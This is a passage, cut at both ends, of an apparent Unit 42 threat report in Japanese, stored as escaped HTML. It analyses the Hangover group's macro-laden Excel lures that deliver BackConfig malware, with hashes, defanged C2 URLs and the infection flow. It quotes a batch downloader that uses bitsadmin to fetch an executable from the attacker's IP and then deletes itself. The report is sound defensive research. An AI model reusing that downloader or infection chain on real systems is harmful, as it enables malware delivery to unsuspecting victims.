42\u304c\u30b5\u30f3\u30d7\u30eb\u3092\u5206\u6790\u3057\u305f1\u9031\u9593\u5f8c\u306b\u65b0\u5927\u7d71\u9818\u304c\u5ba3\u8a93\u5c31\u4efb\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u30b5\u30f3\u30d7\u30ebed638b5...\u306eVBA\u30b3\u30fc\u30c9\u306b\u3088\u3063\u3066\u4ee5\u4e0b\u306b\u793a\u3059URL\u304b\u3089\u76f4\u63a5\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305fEXE\u30da\u30a4\u30ed\u30fc\u30c9(SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd)\u306f\u3001BitDefender\u306e<a href=\"https:\/\/labs.bitdefender.com\/2017\/09\/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit\/\">\u3053\u306e\u8a18\u4e8b<\/a>\u3067\u6307\u6458\u3055\u308c\u3066\u3044\u308b\u5185\u5bb9\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3057\u305f\u3002Unit 
42\u304c2017\u5e74\u5f8c\u534a\u304b\u3089\u4eca\u307e\u3067\u306e\u9593\u306b\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u540c\u69d8\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u78ba\u8a8d\u3057\u305f\u306e\u306f6\u56de\u3060\u3051\u3067\u3059\u304c\u3001\u305d\u308c\u4ee5\u524d\u306e\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001Hangover\u30b0\u30eb\u30fc\u30d7\u304c\u4f7f\u7528\u3059\u308b\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5207\u308a\u66ff\u3048\u3089\u308c\u305f\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3068\u8003\u3048\u3089\u308c\u307e\u3059\u3002\u904e\u53bb\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u6700\u8fd1\u306eBackConfig\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u9593\u306b\u3001\u91cd\u8907\u3059\u308b\u3044\u304f\u3064\u304b\u306e\u6226\u8853\u3001\u624b\u6cd5\u3001\u304a\u3088\u3073\u624b\u9806(TTP)\u304c\u5b58\u5728\u3059\u308b\u306e\u306f\u78ba\u304b\u3067\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">http:\/\/chancetowin.quezknal[.]net\/appstore\/updatepatch\/logs.exe<\/span><\/p>\n<h3><a id=\"post-107263-evolution-of-delivery-payloads\"><\/a>\u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316<\/h3>\n<p>Hangover\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u6700\u65b0\u306e\u30b5\u30f3\u30d7\u30eb\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u65b9\u6cd5\u306e\u8aac\u660e\u3092\u59cb\u3081\u308b\u524d\u306b\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308bTTP\u306e\u9032\u5316\u306e\u6982\u8981\u3092\u4e0b\u56f3\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107266\" aria-describedby=\"caption-attachment-107266\" style=\"width: 2500px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107266 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-2-evolution-of-delivery-payloads.png\" alt=\"\u56f32. 
\u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316\" width=\"2500\" height=\"1257\" \/><figcaption id=\"caption-attachment-107266\" class=\"wp-caption-text\">\u56f31. \u914d\u4fe1\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u9032\u5316<\/figcaption><\/figure>\n<p>\u9577\u5e74\u306b\u308f\u305f\u308b\u9032\u5316\u306b\u3082\u304b\u304b\u308f\u3089\u305a\u3001\u76f4\u3059\u306e\u304c\u96e3\u3057\u3044\u7656\u3082\u3042\u308a\u307e\u3059\u3002\u307e\u305a\u3001Unit 42\u304c\u8abf\u67fb\u3057\u305f\u3059\u3079\u3066\u306e\u5175\u5668\u5316\u3055\u308c\u305fXLS\u306f\u3001\u4ee5\u4e0b\u306e\u56f32\u306b\u793a\u3059\u3088\u3046\u306a\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3057\u3066\u88ab\u5bb3\u8005\u3092\u3060\u307e\u3057\u3066\u3001\u30d5\u30a1\u30a4\u30eb\u304c\u7834\u640d\u3057\u3066\u3044\u308b\u306e\u3067\u4f55\u3082\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u306a\u3044\u3001\u307e\u305f\u306f\u3053\u306e\u5f8c\u3082\u4f55\u3082\u30ed\u30fc\u30c9\u3055\u308c\u306a\u3044\u3001\u3068\u601d\u3044\u8fbc\u307e\u305b\u3066\u3044\u307e\u3057\u305f\u3002\u904e\u53bb\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u5225\u306e\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u30c6\u30ad\u30b9\u30c8\u3067\u306f\u3001\u304a\u304b\u3057\u306a\u30b9\u30da\u30eb\u3084\u6587\u6cd5\u304c\u591a\u304f\u898b\u3089\u308c\u307e\u3057\u305f\u3002<\/p>\n<figure id=\"attachment_107268\" aria-describedby=\"caption-attachment-107268\" style=\"width: 644px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107268 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-3-example-fake-error-message-displayed-to.png\" alt=\"\u56f33. \u88ab\u5bb3\u7aef\u672b\u306b\u8868\u793a\u3055\u308c\u308b\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b\" width=\"644\" height=\"268\" \/><figcaption id=\"caption-attachment-107268\" class=\"wp-caption-text\">\u56f32. 
\u88ab\u5bb3\u7aef\u672b\u306b\u8868\u793a\u3055\u308c\u308b\u507d\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b<\/figcaption><\/figure>\n<p>\u540c\u69d8\u306b\u3001\u5206\u6790\u3057\u305f\u3059\u3079\u3066\u306eExcel\u6587\u66f8\u306b\u683c\u7d0d\u3055\u308c\u3066\u3044\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u60c5\u5831\u30e1\u30bf\u30c7\u30fc\u30bf\u3067\u306f\u3001\u4f5c\u6210\u8005\u3068\u6700\u7d42\u66f4\u65b0\u8005\u306bTesting\u3068\u3044\u3046\u540c\u3058\u540d\u524d\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u3053\u306e\u5f8c\u306e\u5404\u30b5\u30d6\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001\u4e0a\u56f3\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u306e\u6700\u65b0\u306e3\u3064\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3\u3067\u793a\u3055\u308c\u308b\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-milestone-multi-component\"><\/a>2019\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: \u30de\u30eb\u30c1\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<\/h3>\n<p>\u4e0a\u8a18\u306e\u88683\u306eRegistration Form.xls (SHA256: 
be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461)\u306f\u3001\u8105\u5a01\u653b\u6483\u8005\u304c\u4f7f\u7528\u3059\u308b\u30eb\u30a2\u30fc\u306e\u7a2e\u985e\u306e\u4f8b\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306eXLS\u3092\u958b\u3044\u3066\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u3092\u6709\u52b9\u306b\u3059\u308b\u3068\u3001\u767d\u80cc\u666f\u306e\u30bb\u30eb\u306e\u4e0a\u306b\u56f33\u306b\u793a\u3059\u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u793a\u5506\u3059\u308b\u3088\u3046\u306b\u3001\u3053\u308c\u306f\u767b\u9332\u30d5\u30a9\u30fc\u30e0\u3067\u3042\u308a\u3001\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u304c\u56fd\u5185\u306e\u4f4f\u5b85\u4e0d\u8db3\u89e3\u6d88\u3092\u652f\u63f4\u3059\u308b\u76ee\u7684\u3067\u5b9f\u65bd\u3059\u308bNaya Pakistan Housing\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u95a2\u9023\u304c\u3042\u308a\u307e\u3059\u3002\u6709\u8cc7\u683c\u306e\u5e02\u6c11\u306b\u306f\u516c\u52d9\u54e1\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u30012019\u5e7410\u670815\u65e5\u3060\u3063\u305f\u767b\u9332\u30d5\u30a9\u30fc\u30e0\u306e\u7de0\u5207\u304c11\u670815\u65e5\u307e\u3067\u5ef6\u9577\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u300110\u670825\u65e5\u3068\u3044\u3046\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u30bf\u30a4\u30df\u30f3\u30b0\u3068\u30eb\u30a2\u30fc\u304c\u660e\u3089\u304b\u306b\u4fb5\u5bb3\u3059\u308b\u30c1\u30e3\u30f3\u30b9\u306e\u62e1\u5927\u3092\u72d9\u3063\u3066\u306e\u3082\u306e\u3067\u3042\u308b\u3053\u3068\u3092\u610f\u5473\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107270\" aria-describedby=\"caption-attachment-107270\" style=\"width: 1351px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107270 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-4-social-engineering-lure-against-pakistan.png\" alt=\"\u56f34. 
2019\u5e7410\u6708\u306b\u4ed5\u639b\u3051\u3089\u308c\u305f\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u306b\u5bfe\u3059\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u30eb\u30a2\u30fc\" width=\"1351\" height=\"1618\" \/><figcaption id=\"caption-attachment-107270\" class=\"wp-caption-text\">\u56f33. 2019\u5e7410\u6708\u306b\u4ed5\u639b\u3051\u3089\u308c\u305f\u30d1\u30ad\u30b9\u30bf\u30f3\u653f\u5e9c\u306b\u5bfe\u3059\u308b\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u30eb\u30a2\u30fc<\/figcaption><\/figure>\n<p>\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u57f7\u7b46\u6642\u70b9\u3067\u554f\u984c\u306ePHP Web\u30da\u30fc\u30b8\u306f\u5b58\u5728\u3057\u3066\u3044\u306a\u304b\u3063\u305f\u306e\u3067\u3001Unit 42\u306f\u3001XLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u304c\u4e0a\u8a18\u306e\u88683\u306e1\u884c\u76ee\u306b\u793a\u3057\u305fURL\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3092\u8a3c\u660e\u3067\u304d\u307e\u305b\u3093\u3002\u3057\u304b\u3057\u3001\u4ee5\u4e0b\u306e\u70b9\u3067\u3001\u5f0a\u793e\u306f\u305d\u308c\u3089\u306e2\u3064\u304c\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u5f37\u304f\u78ba\u4fe1\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>AutoFocus\u3068VirusTotal\u306f2019\u5e7410\u670825\u65e5\u306b\u521d\u3081\u3066\u3053\u306eXLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u3092\u51e6\u7406\u3057\u3066\u3044\u308b<\/li>\n<li>VirusTotal\u306f\u540c\u3058\u65e5\u306bnsaimmigration... 
URL\u3092\u51e6\u7406\u3057\u3066\u3044\u308b<\/li>\n<li>\u540c\u3058\u65e5\u306bVirusTotal\u3067\u51e6\u7406\u3055\u308c\u305f\u3001nphp_registration_form.php?r=\u3068\u3044\u3046\u7279\u5b9a\u306e\u8a18\u6cd5\u3092\u4f7f\u7528\u3057\u305fHTTP GET\u30ea\u30af\u30a8\u30b9\u30c8URL\u306f\u3001http:\/\/185.203.119[.]184\/fin_div\/session\u306b\u95a2\u9023\u304c\u3042\u308a\u3001\u3053\u308c\u306fXLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u304c\u30c9\u30ed\u30c3\u30d7\u3057\u305fVBS\u30b3\u30fc\u30c9\u306eIP\u30a2\u30c9\u30ec\u30b9\u3068URL\u69cb\u9020\u306b\u4e00\u81f4\u3057\u3066\u3044\u308b<\/li>\n<li>PHP Web\u30da\u30fc\u30b8nphp_registration_form.php\u306e\u540d\u524d\u304c\u3001XLS\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u3068\u95a2\u9023\u304c\u3042\u308b<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p>XLS\u30d5\u30a1\u30a4\u30ebbe3f12b...\u306eVBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u3001\u305d\u308c\u4ee5\u524d\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u3082\u306e\u3068\u306f\u591a\u5c11\u7570\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305fEXE\u30d5\u30a1\u30a4\u30eb\u3092\u76f4\u63a5\u4fdd\u5b58\u3057\u305f\u308a\u3001VBA\u30b3\u30fc\u30c9\u81ea\u4f53\u304c\u76f4\u63a5\u30d0\u30c3\u30c1\u30b7\u30a7\u30eb\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u305f\u308a\u3059\u308b\u306e\u3067\u306f\u306a\u304f\u3001Excel\u30b7\u30fc\u30c8\u306e27\u5217\u76ee\u307e\u305f\u306fAA\u5217(\u307b\u3068\u3093\u3069\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u753b\u9762\u3067\u3001\u3053\u306e\u5217\u306f\u8868\u793a\u3055\u308c\u3066\u3044\u306a\u3044\u53ef\u80fd\u6027\u304c\u9ad8\u3044)\u304b\u3089\u59cb\u307e\u308b\u975e\u8868\u793a\u5217\u306e\u5185\u5bb9\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u30d5\u30a9\u30f3\u30c8\u306e\u8272\u304c\u5909\u5316\u3057\u305f\u5f8c\u3001\u4ee5\u4e0b\u306e\u56f34\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u53e4\u3044\u4e9c\u7a2e\u3068\u540c\u3058\u300csetup\u300d\u30d0\u30c3\u30c1 \u30b3\u30fc\u30c9 
\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3068\u65b0\u3057\u3044Visual Basic Script (VBS)\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u304c\u3001AA\u5217\u3068AB\u5217\u306b\u305d\u308c\u305e\u308c\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107272\" aria-describedby=\"caption-attachment-107272\" style=\"width: 1704px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-107272 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-5-vbs-downloader-and-bat-setup-file-reveal.png\" alt=\"\u56f35. XLS\u306e\u30b7\u30fc\u30c8\u306b\u8868\u793a\u3055\u308c\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3068BAT\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb\" width=\"1704\" height=\"716\" \/><figcaption id=\"caption-attachment-107272\" class=\"wp-caption-text\">\u56f34. XLS\u306e\u30b7\u30fc\u30c8\u306b\u8868\u793a\u3055\u308c\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3068BAT\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u30d5\u30a1\u30a4\u30eb<\/figcaption><\/figure>\n<p>XLS\u306eVBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306f\u30012\u3064\u306e\u5217\u306e\u5185\u5bb9\u30921\u884c\u305a\u3064\u89e3\u6790\u3057\u3001\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u305d\u308c\u305e\u308c\u66f8\u304d\u51fa\u3057\u3066\u3001\u4ee5\u4e0b\u306e\u56f35\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u306e\u3068\u540c\u3058\u30d7\u30ed\u30bb\u30b9\u30d5\u30ed\u30fc\u306b\u5f93\u3063\u3066\u305d\u308c\u3089\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-107263-milestone-bits-and-zips\"><\/a>2019\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: BITS\u3068ZIP<\/h3>\n<p>2019\u5e7411\u670815\u65e5\u306b\u3001WildFire\u304c\u6700\u8fd1\u78ba\u8a8d\u3057\u305f\u5175\u5668\u5316\u3055\u308c\u305fXLS\u30d5\u30a1\u30a4\u30eb(SHA256: 
021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b)\u3092\u5206\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u3044\u304f\u3064\u304b\u306e\u65b0\u3057\u3044\u624b\u6cd5\u304c\u660e\u3089\u304b\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u4eca\u56de\u306f\u3001VBA\u30de\u30af\u30ed\u30b3\u30fc\u30c9\u306b\u3001\u30b5\u30a4\u30ba\u304c1,062\u30d0\u30a4\u30c8\u3057\u304b\u306a\u304410\u9032\u7b26\u53f7\u5316\u3055\u308c\u305fZIP\u30d5\u30a1\u30a4\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002ZIP\u30a2\u30fc\u30ab\u30a4\u30d6\u306e\u4e2d\u306b\u306f\u3001driverkit\u30d5\u30a9\u30eb\u30c0\u306b\u89e3\u51cd\u3055\u308c\u308b2\u3064\u306e\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u3042\u308a\u307e\u3057\u305f\u30021\u3064\u306fdriverkit.bat\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u524d\u8ff0\u3057\u305f\u300csetup\u300dBAT\u30d5\u30a1\u30a4\u30eb\u3067\u3042\u308a\u3001\u4ed8\u9332\u30bb\u30af\u30b7\u30e7\u30f3\u306e\u30ea\u30b9\u30c8\u306b\u8a18\u8f09\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3082\u30461\u3064\u306fWinmgt.txt\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u524d\u8ff0\u3057\u305fVBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u3092\u7ffb\u6848\u3057\u305f\u3082\u306e\u3067\u3059\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u3001MSXML DOM\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f7f\u7528\u3057\u3066\u76f4\u63a5HTTP\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u884c\u3046\u306e\u3067\u306f\u306a\u304f\u3001Winmgt_Drive.bat\u306b\u4ee5\u4e0b\u306e\u5185\u5bb9\u3092\u66f8\u304d\u8fbc\u3093\u3067\u3001\u300csetup\u300dBAT\u30d5\u30a1\u30a4\u30eb\u3067\u4f5c\u6210\u3059\u308b3\u756a\u76ee\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3067\u305d\u308c\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">echo off\r\nbitsadmin \/transfer Microsoft_Update \/download \/priority high 
\r\nhttp:\/\/185.203.119[.]184\/winmgt\/winmgt.exe \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\winmgt.exe\r\ndel %0<\/pre>\n<h3><a id=\"post-107263-milestone-fine-tuning\"><\/a>2020\u5e74\u306e\u30de\u30a4\u30eb\u30b9\u30c8\u30f3: \u5fae\u8abf\u6574<\/h3>\n<p>\u4ee5\u4e0b\u306b\u793a\u3059\u5b9f\u884c\u30d5\u30ed\u30fc\u56f3\u306f\u3001Unit 42\u304c\u78ba\u8a8d\u3057\u305f\u6700\u65b0\u306e\u5175\u5668\u5316\u3055\u308c\u305f\u6587\u66f8\u306e1\u3064\u3067\u3042\u308bInvoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c\u3001\u521d\u56de\u89b3\u6e2c\u65e5\u6642\u306f2020\u5e741\u670815\u65e5)\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u611f\u67d3\u30d7\u30ed\u30bb\u30b9\u306f\u30011\u3064\u524d\u306e\u30b5\u30d6\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305f\u8907\u6570\u306e\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3067\u69cb\u6210\u3055\u308c\u3066\u3044\u307e\u3059\u3002VBA\u304c\u300csetup\u300d\u30d0\u30c3\u30c1(BAT)\u30d5\u30a1\u30a4\u30eb\u3092\u30c7\u30a3\u30b9\u30af\u4e0a\u306b\u66f8\u304d\u8fbc\u3093\u3067\u5b9f\u884c\u3057\u305f\u5f8c\u306f\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u304cBackConfig\u30d7\u30e9\u30b0\u30a4\u30f3\u30ed\u30fc\u30c0\u30fc\u306e\u611f\u67d3\u30d7\u30ed\u30bb\u30b9\u306e\u5927\u90e8\u5206\u3092\u8abf\u6574\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_107274\" aria-describedby=\"caption-attachment-107274\" style=\"width: 800px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-6-execution-flow-of-backconfig-malware.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-107274 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/\/2020\/05\/figure-6-execution-flow-of-backconfig-malware.png\" alt=\"\u56f36. 
BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u30d5\u30ed\u30fc\" width=\"800\" height=\"998\" \/><\/a><figcaption id=\"caption-attachment-107274\" class=\"wp-caption-text\">\u56f35. BackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u30d5\u30ed\u30fc<\/figcaption><\/figure>\n<p>\u56f35\u306b\u3064\u3044\u3066\u3001\u4ee5\u4e0b\u306b\u793a\u3059\u756a\u53f7\u4ed8\u304d\u306e\u7b87\u6761\u66f8\u304d\u30ea\u30b9\u30c8\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>Drive.txt\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb(SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)\u304c\u4f5c\u6210\u3055\u308c\u300110\u9032\u7b26\u53f7\u5316\u3055\u308c\u305fVBS\u304c\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002<\/li>\n<li>VBA\u30b3\u30fc\u30c9\u306f\u3001\u540c\u3058\u3088\u3046\u306b\u3001Audio.txt\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u306b\u30d0\u30c3\u30c1\u30b3\u30fc\u30c9\u3092\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u4e21\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9\u306f\u3001\u3053\u306e\u30ec\u30dd\u30fc\u30c8\u306e\u4ed8\u9332\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u793a\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/li>\n<li>Audio.txt\u306e\u540d\u524d\u3092Audio.bat\u306b\u5909\u66f4\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u3001\u904e\u53bb\u306e\u611f\u67d3\u306b\u95a2\u9023\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u3068\u30d5\u30a9\u30eb\u30c0\u304c\u3042\u308c\u3070\u305d\u308c\u3089\u3092\u6d88\u53bb\u3057\u3066\u3001\u5fc5\u8981\u306a\u74b0\u5883\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305d\u306e\u4e2d\u306b\u306f\u3001\u524d\u8ff0\u306epid.txt\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3059\u308b\u3053\u3068\u3084\u3001\u3055\u307e\u3056\u307e\u306a\u30d5\u30a9\u30eb\u30c0\u3068\u30d5\u30a1\u30a4\u30eb\u304cWindows\u6a19\u6e96\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30fc\u30e9\u753b\u9762\u306b\u8868\u793a\u3055\u308c\u306a
\u3044\u3088\u3046\u306b\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u304c\u542b\u307e\u308c\u307e\u3059\u3002pid.txt\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3001\u30cf\u30a4\u30d5\u30f3\u3001\u304a\u3088\u3073\u30e9\u30f3\u30c0\u30e0\u306a\u6570\u5b57\u304c\u7d9a\u3051\u3066\u4e26\u3093\u3067\u3044\u307e\u3059\u304c\u3001\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306f\u610f\u56f3\u3057\u305f\u3088\u3046\u306b\u306f\u52d5\u4f5c\u3057\u3066\u3044\u306a\u3044\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u7d9a\u3051\u3066\u3001\u307e\u3060\u5b58\u5728\u3057\u3066\u3044\u306a\u3044dphc.exe\u3068Drive.vbs\u306e2\u3064\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u53c2\u7167\u3059\u308b2\u3064\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002dphc.exe\u306f10\u5206\u304a\u304d\u3001Drive.vbs\u306f20\u5206\u304a\u304d\u306b\u52d5\u4f5c\u3057\u307e\u3059\u3002<\/li>\n<li>Audio.bat\u306f\u6700\u5f8c\u306b\u3001Drive.txt\u306e\u540d\u524d\u3092Drive.vbs\u306b\u5909\u66f4\u3057\u3066\u3001\u81ea\u3089\u3092\u524a\u9664\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u306b\u3088\u3063\u3066Drive.vbs\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002Drive.vbs\u306f\u3001BackConfig\u306e\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb8892279f3...\u306e\u5834\u5408\u3001\u30ea\u30e2\u30fc\u30c8\u30ed\u30b1\u30fc\u30b7\u30e7\u30f3\u306fhttp:\/\/185.203.119[.]184\/Dropbox\/request\u3067\u3059\u3002<\/li>\n<li>\u305d\u306e\u5f8c\u3001\u30bf\u30b9\u30af\u30b9\u30b1\u30b8\u30e5\u30fc\u30e9\u306b\u3088\u3063\u3066dphc.exe\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002dphc.exe\u306f\u307e\u305apid.txt 
